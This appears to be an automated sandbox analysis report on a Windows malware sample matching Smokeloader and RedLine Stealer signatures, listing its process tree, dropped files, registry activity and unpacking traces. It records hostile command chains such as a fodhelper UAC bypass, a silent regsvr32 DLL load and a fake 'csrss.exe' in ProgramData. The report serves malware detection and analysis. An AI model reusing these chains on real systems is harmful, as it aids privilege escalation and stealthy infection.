                                Source: 00000011.00000002.2189728450.0000000000880000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
                                Source: 0000002B.00000002.2457438391.0000000000909000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
                                Source: 00000000.00000002.1711348411.00000000024A0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
                                Source: 0000000E.00000002.2113842934.0000000002C00000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
                                Source: C:\Users\user\AppData\Local\Temp\B013.exe, type: DROPPEDMatched rule: INDICATOR_EXE_Packed_DotNetReactor author = ditekSHen, description = Detects executables packed with unregistered version of .NET Reactor
                                Source: ZRgv8wdMtR.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                Source: 8F78.exe.1.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                Source: CA06.exe.1.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                Source: wesswwi.1.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                Source: gwsswwi.1.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                Source: csrss.exe.7.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                Source: splitcontrolvb.exe.30.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                Source: _RegDLL.tmp.30.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                Source: PDiskSnap75.exe.38.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                Source: B013.exe.1.drStatic PE information: Section: ZLIB complexity 0.9998024635800402
                                Source: A748.dll.1.drStatic PE information: Section: .rdata ZLIB complexity 0.998700420673077
                                Source: A748.dll.1.drStatic PE information: Section: .code ZLIB complexity 0.9975982186681938
                                Source: is-M3SQC.tmp.30.drStatic PE information: Section: ZLIB complexity 0.9964533211297071
                                Source: is-N5KRR.tmp.30.drStatic PE information: Section: ZLIB complexity 0.9976058467741935
                                Source: is-B8UB5.tmp.30.drStatic PE information: Section: ZLIB complexity 0.995148689516129
                                Source: is-CV65T.tmp.30.drStatic PE information: Section: ZLIB complexity 0.9908203125
                                Source: is-8RC7G.tmp.30.drStatic PE information: Section: ZLIB complexity 0.9903624487704918
                                Source: is-SK9ML.tmp.30.drStatic PE information: Section: ZLIB complexity 0.9891526442307692
                                Source: classification engineClassification label: mal100.spre.troj.spyw.expl.evad.winEXE@66/1087@297/100
                                Source: C:\Users\user\AppData\Local\Temp\A19A.exeCode function: 8_2_00007FF6E1B374E0 GetLastError,FormatMessageW,WideCharToMultiByte,8_2_00007FF6E1B374E0
                                Source: C:\Users\user\Desktop\ZRgv8wdMtR.exeCode function: 0_2_009703E6 CreateToolhelp32Snapshot,Module32First,0_2_009703E6
                                Source: C:\Users\user\AppData\Local\Temp\is-OHGN5.tmp\FC24.tmpFile created: C:\Program Files (x86)\SplitControlVB
                                Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Roaming\wesswwiJump to behavior
                                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4432:120:WilError_03
                                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2000:120:WilError_03
                                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1308:120:WilError_03
                                Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\8F78.tmpJump to behavior
                                Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\explorer.exe
                                Source: C:\Windows\explorer.exeProcess created: C:\Windows\explorer.exe
                                Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\explorer.exeJump to behavior
                                Source: C:\Windows\explorer.exeProcess created: C:\Windows\explorer.exeJump to behavior
                                Source: ZRgv8wdMtR.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                Source: C:\Users\user\AppData\Local\Temp\B013.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a403a0b75e95c07da2caa7f780446a62\mscorlib.ni.dll
                                Source: C:\Users\user\AppData\Local\Temp\B013.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process Where SessionId=&apos;1&apos;
                                Source: C:\Users\user\AppData\Local\Temp\B013.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process Where SessionId=&apos;1&apos;
                                Source: C:\Users\user\AppData\Local\Temp\B013.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                                Source: C:\Users\user\AppData\Local\Temp\E36B.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Name FROM Win32_Processor
                                Source: C:\Windows\explorer.exeFile read: C:\Users\desktop.iniJump to behavior
                                Source: C:\Users\user\Desktop\ZRgv8wdMtR.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\is-OHGN5.tmp\FC24.tmpKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion RegisteredOrganization
                                Source: C:\Program Files (x86)\SplitControlVB\splitcontrolvb.exeFile read: C:\Windows\System32\drivers\etc\hosts
                                Source: C:\Program Files (x86)\SplitControlVB\splitcontrolvb.exeFile read: C:\Windows\System32\drivers\etc\hosts
                                Source: ZRgv8wdMtR.exeVirustotal: Detection: 44%
                                Source: ZRgv8wdMtR.exeReversingLabs: Detection: 37%
                                Source: unknownProcess created: C:\Users\user\Desktop\ZRgv8wdMtR.exe C:\Users\user\Desktop\ZRgv8wdMtR.exe
                                Source: unknownProcess created: C:\Users\user\AppData\Roaming\wesswwi C:\Users\user\AppData\Roaming\wesswwi
                                Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\8F78.exe C:\Users\user\AppData\Local\Temp\8F78.exe
                                Source: C:\Users\user\AppData\Local\Temp\8F78.exeProcess created: C:\Users\user\AppData\Local\Temp\8F78.exe C:\Users\user\AppData\Local\Temp\8F78.exe
                                Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\A19A.exe C:\Users\user\AppData\Local\Temp\A19A.exe
                                Source: C:\Windows\explorer.exeProcess created: C:\Windows\System32\regsvr32.exe regsvr32 /s C:\Users\user\AppData\Local\Temp\A748.dll
                                Source: C:\Windows\System32\regsvr32.exeProcess created: C:\Windows\SysWOW64\regsvr32.exe /s C:\Users\user\AppData\Local\Temp\A748.dll
                                Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\B013.exe C:\Users\user\AppData\Local\Temp\B013.exe
                                Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\B43A.exe C:\Users\user\AppData\Local\Temp\B43A.exe
                                Source: C:\Users\user\AppData\Local\Temp\B43A.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Source: C:\Windows\explorer.exeProcess created: C:\ProgramData\Drivers\csrss.exe "C:\ProgramData\Drivers\csrss.exe"
                                Source: C:\ProgramData\Drivers\csrss.exeProcess created: C:\ProgramData\Drivers\csrss.exe "C:\ProgramData\Drivers\csrss.exe"
                                Source: C:\Users\user\AppData\Local\Temp\A19A.exeProcess created: C:\Users\user\AppData\Local\Temp\A19A.exe C:\Users\user\AppData\Local\Temp\A19A.exe
                                Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\CA06.exe C:\Users\user\AppData\Local\Temp\CA06.exe
                                Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\E36B.exe C:\Users\user\AppData\Local\Temp\E36B.exe
                                Source: C:\Windows\explorer.exeProcess created: C:\ProgramData\Drivers\csrss.exe "C:\ProgramData\Drivers\csrss.exe"
                                Source: C:\ProgramData\Drivers\csrss.exeProcess created: C:\ProgramData\Drivers\csrss.exe "C:\ProgramData\Drivers\csrss.exe"
                                Source: C:\Users\user\AppData\Local\Temp\E36B.exeProcess created: C:\Users\user\AppData\Local\Temp\E36B.exe C:\Users\user\AppData\Local\Temp\E36B.exe
                                Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\FC24.exe C:\Users\user\AppData\Local\Temp\FC24.exe
                                Source: C:\Users\user\AppData\Local\Temp\FC24.exeProcess created: C:\Users\user\AppData\Local\Temp\is-EM1CB.tmp\FC24.tmp "C:\Users\user\AppData\Local\Temp\is-EM1CB.tmp\FC24.tmp" /SL5="$50482,8207148,54272,C:\Users\user\AppData\Local\Temp\FC24.exe"
                                Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
                                Source: C:\Users\user\AppData\Local\Temp\is-EM1CB.tmp\FC24.tmpProcess created: C:\Users\user\AppData\Local\Temp\FC24.exe "C:\Users\user\AppData\Local\Temp\FC24.exe" /SPAWNWND=$3048A /NOTIFYWND=$50482
                                Source: C:\Windows\explorer.exeProcess created: C:\Windows\explorer.exe C:\Windows\explorer.exe
                                Source: C:\Users\user\AppData\Local\Temp\E36B.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\Sysnative\cmd.exe /C fodhelper
                                Source: C:\Users\user\AppData\Local\Temp\FC24.exeProcess created: C:\Users\user\AppData\Local\Temp\is-OHGN5.tmp\FC24.tmp "C:\Users\user\AppData\Local\Temp\is-OHGN5.tmp\FC24.tmp" /SL5="$5008E,8207148,54272,C:\Users\user\AppData\Local\Temp\FC24.exe" /SPAWNWND=$3048A /NOTIFYWND=$50482
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\fodhelper.exe fodhelper
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\fodhelper.exe "C:\Windows\system32\fodhelper.exe"
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\fodhelper.exe "C:\Windows\system32\fodhelper.exe"
                                Source: C:\Users\user\AppData\Local\Temp\is-OHGN5.tmp\FC24.tmpProcess created: C:\Windows\SysWOW64\net.exe "C:\Windows\system32\net.exe" helpmsg 20
                                Source: C:\Windows\SysWOW64\net.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Source: C:\Users\user\AppData\Local\Temp\is-OHGN5.tmp\FC24.tmpProcess created: C:\Program Files (x86)\SplitControlVB\splitcontrolvb.exe "C:\Program Files (x86)\SplitControlVB\splitcontrolvb.exe" -i
                                Source: C:\Windows\SysWOW64\net.exeProcess created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 helpmsg 20
                                Source: C:\Windows\System32\fodhelper.exeProcess created: C:\Users\user\AppData\Local\Temp\E36B.exe "C:\Users\user\AppData\Local\Temp\E36B.exe"
                                Source: C:\Users\user\AppData\Local\Temp\is-OHGN5.tmp\FC24.tmpProcess created: C:\Program Files (x86)\SplitControlVB\splitcontrolvb.exe "C:\Program Files (x86)\SplitControlVB\splitcontrolvb.exe" -s
                                Source: C:\Users\user\AppData\Local\Temp\E36B.exeProcess created: C:\Users\user\AppData\Local\Temp\E36B.exe "C:\Users\user\AppData\Local\Temp\E36B.exe"
                                Source: unknownProcess created: C:\Users\user\AppData\Roaming\gwsswwi C:\Users\user\AppData\Roaming\gwsswwi
                                Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\8F78.exe C:\Users\user\AppData\Local\Temp\8F78.exeJump to behavior
                                Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\A19A.exe C:\Users\user\AppData\Local\Temp\A19A.exeJump to behavior
                                Source: C:\Windows\explorer.exeProcess created: C:\Windows\System32\regsvr32.exe regsvr32 /s C:\Users\user\AppData\Local\Temp\A748.dllJump to behavior
                                Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\B013.exe C:\Users\user\AppData\Local\Temp\B013.exeJump to behavior
                                Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\B43A.exe C:\Users\user\AppData\Local\Temp\B43A.exeJump to behavior
                                Source: C:\Windows\explorer.exeProcess created: C:\ProgramData\Drivers\csrss.exe "C:\ProgramData\Drivers\csrss.exe" Jump to behavior
                                Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\CA06.exe C:\Users\user\AppData\Local\Temp\CA06.exeJump to behavior
                                Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\E36B.exe C:\Users\user\AppData\Local\Temp\E36B.exeJump to behavior
                                Source: C:\Windows\explorer.exeProcess created: C:\ProgramData\Drivers\csrss.exe "C:\ProgramData\Drivers\csrss.exe" Jump to behavior
                                Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\FC24.exe C:\Users\user\AppData\Local\Temp\FC24.exeJump to behavior
                                Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exeJump to behavior
                                Source: C:\Windows\explorer.exeProcess created: C:\Windows\explorer.exe C:\Windows\explorer.exeJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\8F78.exeProcess created: C:\Users\user\AppData\Local\Temp\8F78.exe C:\Users\user\AppData\Local\Temp\8F78.exeJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\A19A.exeProcess created: C:\Users\user\AppData\Local\Temp\A19A.exe C:\Users\user\AppData\Local\Temp\A19A.exeJump to behavior
                                Source: C:\Windows\System32\regsvr32.exeProcess created: C:\Windows\SysWOW64\regsvr32.exe /s C:\Users\user\AppData\Local\Temp\A748.dll
                                Source: C:\ProgramData\Drivers\csrss.exeProcess created: C:\ProgramData\Drivers\csrss.exe "C:\ProgramData\Drivers\csrss.exe"
                                Source: C:\Users\user\AppData\Local\Temp\E36B.exeProcess created: C:\Users\user\AppData\Local\Temp\E36B.exe C:\Users\user\AppData\Local\Temp\E36B.exe
                                Source: C:\ProgramData\Drivers\csrss.exeProcess created: C:\ProgramData\Drivers\csrss.exe "C:\ProgramData\Drivers\csrss.exe"
                                Source: C:\Users\user\AppData\Local\Temp\E36B.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\Sysnative\cmd.exe /C fodhelper
                                Source: C:\Users\user\AppData\Local\Temp\FC24.exeProcess created: C:\Users\user\AppData\Local\Temp\is-EM1CB.tmp\FC24.tmp "C:\Users\user\AppData\Local\Temp\is-EM1CB.tmp\FC24.tmp" /SL5="$50482,8207148,54272,C:\Users\user\AppData\Local\Temp\FC24.exe"
                                Source: C:\Users\user\AppData\Local\Temp\FC24.exeProcess created: C:\Users\user\AppData\Local\Temp\is-OHGN5.tmp\FC24.tmp "C:\Users\user\AppData\Local\Temp\is-OHGN5.tmp\FC24.tmp" /SL5="$5008E,8207148,54272,C:\Users\user\AppData\Local\Temp\FC24.exe" /SPAWNWND=$3048A /NOTIFYWND=$50482
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\fodhelper.exe fodhelper
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\fodhelper.exe "C:\Windows\system32\fodhelper.exe"
                                Source: C:\Users\user\AppData\Local\Temp\is-OHGN5.tmp\FC24.tmpProcess created: C:\Windows\SysWOW64\net.exe "C:\Windows\system32\net.exe" helpmsg 20
                                Source: C:\Users\user\AppData\Local\Temp\is-OHGN5.tmp\FC24.tmpProcess created: C:\Program Files (x86)\SplitControlVB\splitcontrolvb.exe "C:\Program Files (x86)\SplitControlVB\splitcontrolvb.exe" -i
                                Source: C:\Users\user\AppData\Local\Temp\is-OHGN5.tmp\FC24.tmpProcess created: C:\Program Files (x86)\SplitControlVB\splitcontrolvb.exe "C:\Program Files (x86)\SplitControlVB\splitcontrolvb.exe" -s
                                Source: C:\Windows\System32\fodhelper.exeProcess created: C:\Users\user\AppData\Local\Temp\E36B.exe "C:\Users\user\AppData\Local\Temp\E36B.exe"
                                Source: C:\Windows\SysWOW64\net.exeProcess created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 helpmsg 20
                                Source: C:\Users\user\AppData\Local\Temp\E36B.exeProcess created: C:\Users\user\AppData\Local\Temp\E36B.exe "C:\Users\user\AppData\Local\Temp\E36B.exe"
                                Source: C:\Windows\explorer.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{603D3801-BD81-11d0-A3A5-00C04FD706EC}\InProcServer32Jump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\is-OHGN5.tmp\FC24.tmpKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion RegisteredOwner
                                Source: C:\Users\user\AppData\Local\Temp\is-OHGN5.tmp\FC24.tmpWindow found: window name: TMainForm
                                Source: Window RecorderWindow detected: More than 3 window changes detected
                                Source: C:\Windows\SysWOW64\explorer.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
                                Source: C:\Users\user\Desktop\ZRgv8wdMtR.exeFile opened: C:\Windows\SysWOW64\msvcr100.dllJump to behavior
                                Source: ZRgv8wdMtR.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                                Source: Binary string: Unrecognized pdb formatThis error indicates attempting to access a .pdb file with source: E36B.exe, 00000012.00000002.2204215062.000000000349C000.00000040.00001000.00020000.00000000.sdmp
                                Source: Binary string: A connection with the server could not be establishedAn extended error was returned from the WinHttp serverThe .pdb file is probably no longer indexed in the symbol server share location. source: E36B.exe, 00000012.00000002.2204215062.000000000349C000.00000040.00001000.00020000.00000000.sdmp
                                Source: Binary string: Age does not matchThe module age and .pdb age do not match. source: E36B.exe, 00000012.00000002.2204215062.000000000349C000.00000040.00001000.00020000.00000000.sdmp
                                Source: Binary string: C:\A\18\s\PCbuild\amd64\_bz2.pdb source: A19A.exe, 00000008.00000003.2025907926.00000208D2DED000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: Cvinfo is corruptThe .pdb file contains a corrupted debug codeview information. source: E36B.exe, 00000012.00000002.2204215062.000000000349C000.00000040.00001000.00020000.00000000.sdmp
                                Source: Binary string: Downloading symbols for [%s] %ssrv*symsrv*http://https://_bad_pdb_file.pdb source: E36B.exe, 00000012.00000002.2204215062.000000000349C000.00000040.00001000.00020000.00000000.sdmp
                                Source: Binary string: The symbol server has never indexed any version of this symbol fileNo version of the .pdb file with the given name has ever been registered. source: E36B.exe, 00000012.00000002.2204215062.000000000349C000.00000040.00001000.00020000.00000000.sdmp
                                Source: Binary string: PDB not foundUnable to locate the .pdb file in any of the symbol search path locations. source: E36B.exe, 00000012.00000002.2204215062.000000000349C000.00000040.00001000.00020000.00000000.sdmp
                                Source: Binary string: C:\wifiv.pdb source: ZRgv8wdMtR.exe, 00000000.00000002.1710750264.0000000000423000.00000002.00000001.01000000.00000003.sdmp, ZRgv8wdMtR.exe, 00000000.00000000.1639926914.0000000000423000.00000002.00000001.01000000.00000003.sdmp, wesswwi, 00000003.00000002.1951101538.0000000000423000.00000002.00000001.01000000.00000005.sdmp, wesswwi, 00000003.00000000.1895196881.0000000000423000.00000002.00000001.01000000.00000005.sdmp
                                Source: Binary string: Drive not readyThis error indicates a .pdb file related failure. source: E36B.exe, 00000012.00000002.2204215062.000000000349C000.00000040.00001000.00020000.00000000.sdmp
                                Source: Binary string: Error while loading symbolsUnable to locate the .pdb file in any of the symbol search source: E36B.exe, 00000012.00000002.2204215062.000000000349C000.00000040.00001000.00020000.00000000.sdmp
                                Source: Binary string: zzz_AsmCodeRange_*FrameDatainvalid string positionstring too long.pdb source: E36B.exe, 00000012.00000002.2204215062.000000000349C000.00000040.00001000.00020000.00000000.sdmp
                                Source: Binary string: Pdb read access deniedYou may be attempting to access a .pdb file with read-only attributes source: E36B.exe, 00000012.00000002.2204215062.000000000349C000.00000040.00001000.00020000.00000000.sdmp
                                Source: Binary string: FNC:\wifiv.pdb source: ZRgv8wdMtR.exe, 00000000.00000002.1710750264.0000000000423000.00000002.00000001.01000000.00000003.sdmp, ZRgv8wdMtR.exe, 00000000.00000000.1639926914.0000000000423000.00000002.00000001.01000000.00000003.sdmp, wesswwi, 00000003.00000002.1951101538.0000000000423000.00000002.00000001.01000000.00000005.sdmp, wesswwi, 00000003.00000000.1895196881.0000000000423000.00000002.00000001.01000000.00000005.sdmp
                                Source: Binary string: vcruntime140.amd64.pdbGCTL source: A19A.exe, 00000008.00000003.2025757354.00000208D2DEC000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: Unable to locate the .pdb file in this location source: E36B.exe, 00000012.00000002.2204215062.000000000349C000.00000040.00001000.00020000.00000000.sdmp
                                Source: Binary string: The module signature does not match with .pdb signature. source: E36B.exe, 00000012.00000002.2204215062.000000000349C000.00000040.00001000.00020000.00000000.sdmp
                                Source: Binary string: .pdb.dbg source: E36B.exe, 00000012.00000002.2204215062.000000000349C000.00000040.00001000.00020000.00000000.sdmp
                                Source: Binary string: '(EfiGuardDxe.pdbx source: E36B.exe, 00000012.00000002.2204215062.000000000349C000.00000040.00001000.00020000.00000000.sdmp
                                Source: Binary string: C:\huc.pdb source: 8F78.exe, 00000006.00000000.1985139103.00000000005C7000.00000002.00000001.01000000.00000006.sdmp, 8F78.exe, 00000006.00000002.1999183103.00000000005C7000.00000002.00000001.01000000.00000006.sdmp, 8F78.exe, 00000007.00000000.1994994262.00000000005C7000.00000002.00000001.01000000.00000006.sdmp, csrss.exe, 00000013.00000000.2184388498.00000000005C7000.00000002.00000001.01000000.0000000D.sdmp
                                Source: Binary string: or you do not have access permission to the .pdb location. source: E36B.exe, 00000012.00000002.2204215062.000000000349C000.00000040.00001000.00020000.00000000.sdmp
                                Source: Binary string: An Exception happened while downloading the module .pdbPlease open a bug if this is a consistent repro. source: E36B.exe, 00000012.00000002.2204215062.000000000349C000.00000040.00001000.00020000.00000000.sdmp
                                Source: Binary string: EfiGuardDxe.pdb source: E36B.exe, 00000012.00000002.2204215062.000000000349C000.00000040.00001000.00020000.00000000.sdmp
                                Source: Binary string: Signature does not matchThe module signature does not match with .pdb signature source: E36B.exe, 00000012.00000002.2204215062.000000000349C000.00000040.00001000.00020000.00000000.sdmp
                                Source: Binary string: vcruntime140.amd64.pdb source: A19A.exe, 00000008.00000003.2025757354.00000208D2DEC000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: dbghelp.pdb source: E36B.exe, 00000012.00000002.2204215062.000000000349C000.00000040.00001000.00020000.00000000.sdmp
                                Source: Binary string: dbghelp.pdbGCTL source: E36B.exe, 00000012.00000002.2204215062.000000000349C000.00000040.00001000.00020000.00000000.sdmp

                                Data Obfuscation

                                barindex
                                Source: C:\Users\user\Desktop\ZRgv8wdMtR.exeUnpacked PE file: 0.2.ZRgv8wdMtR.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R; vs .text:EW;
                                Source: C:\Users\user\AppData\Roaming\wesswwiUnpacked PE file: 3.2.wesswwi.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R; vs .text:EW;
                                Source: C:\Users\user\AppData\Local\Temp\B013.exeUnpacked PE file: 11.2.B013.exe.dc0000.0.unpack .text:ER; :R;.reloc:R;.idata:W;.rsrc:R;.themida:EW;.boot:ER; vs .text:ER; :R;.reloc:R;
                                Source: C:\Users\user\AppData\Local\Temp\CA06.exeUnpacked PE file: 17.2.CA06.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R; vs .text:EW;
                                Source: C:\Users\user\AppData\Local\Temp\E36B.exeUnpacked PE file: 21.2.E36B.exe.400000.1.unpack .text:ER;.rdata:R;.data:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.idata:W;.reloc:R;.symtab:R;
                                Source: C:\Program Files (x86)\SplitControlVB\splitcontrolvb.exeUnpacked PE file: 38.2.splitcontrolvb.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R;.cmail:EW; vs .text:ER;.rdata:R;.data:W;.vmp0:ER;.rsrc:R;
                                Source: C:\Program Files (x86)\SplitControlVB\splitcontrolvb.exeUnpacked PE file: 41.2.splitcontrolvb.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R;.cmail:EW; vs .text:ER;.rdata:R;.data:W;.vmp0:ER;.rsrc:R;
                                Source: C:\Users\user\AppData\Local\Temp\E36B.exeUnpacked PE file: 42.2.E36B.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.idata:W;.reloc:R;.symtab:R;
                                Source: C:\Users\user\AppData\Roaming\gwsswwiUnpacked PE file: 43.2.gwsswwi.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R; vs .text:EW;
                                Source: C:\Users\user\AppData\Local\Temp\E36B.exeUnpacked PE file: 21.2.E36B.exe.400000.1.unpack
                                Source: C:\Program Files (x86)\SplitControlVB\splitcontrolvb.exeUnpacked PE file: 38.2.splitcontrolvb.exe.400000.0.unpack
                                Source: C:\Program Files (x86)\SplitControlVB\splitcontrolvb.exeUnpacked PE file: 41.2.splitcontrolvb.exe.400000.0.unpack
                                Source: C:\Users\user\AppData\Local\Temp\E36B.exeUnpacked PE file: 42.2.E36B.exe.400000.0.unpack
                                Source: B013.exe.1.drStatic PE information: 0xAEF8BC98 [Tue Jan 9 02:53:12 2063 UTC]
                                Source: C:\Users\user\AppData\Local\Temp\8F78.exeCode function: 7_2_0069D030 LoadLibraryA,GetProcAddress,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,__decode_pointer,__decode_pointer,__decode_pointer,__decode_pointer,__decode_pointer,7_2_0069D030
                                Source: initial sampleStatic PE information: section where entry point is pointing to: .boot
                                Source: is-M3SQC.tmp.30.drStatic PE information: real checksum: 0x0 should be: 0x1fec7
                                Source: is-LN8F3.tmp.30.drStatic PE information: real checksum: 0x0 should be: 0x7c1a
                                Source: is-N5KRR.tmp.30.drStatic PE information: real checksum: 0x0 should be: 0x10609
                                Source: is-9EJD1.tmp.30.drStatic PE information: real checksum: 0x0 should be: 0x127ab
                                Source: is-7D04O.tmp.30.drStatic PE information: real checksum: 0x0 should be: 0x1f2f4
                                Source: is-8RC7G.tmp.30.drStatic PE information: real checksum: 0x0 should be: 0xc979
                                Source: _isdecmp.dll.30.drStatic PE information: real checksum: 0x0 should be: 0x5528
                                Source: is-8N3DM.tmp.30.drStatic PE information: real checksum: 0x0 should be: 0x4ac84
                                Source: is-M5NA9.tmp.30.drStatic PE information: real checksum: 0x0 should be: 0x6b1f
                                Source: is-ARAOP.tmp.30.drStatic PE information: real checksum: 0x0 should be: 0xadc6
                                Source: is-NPP07.tmp.30.drStatic PE information: real checksum: 0x0 should be: 0x31782
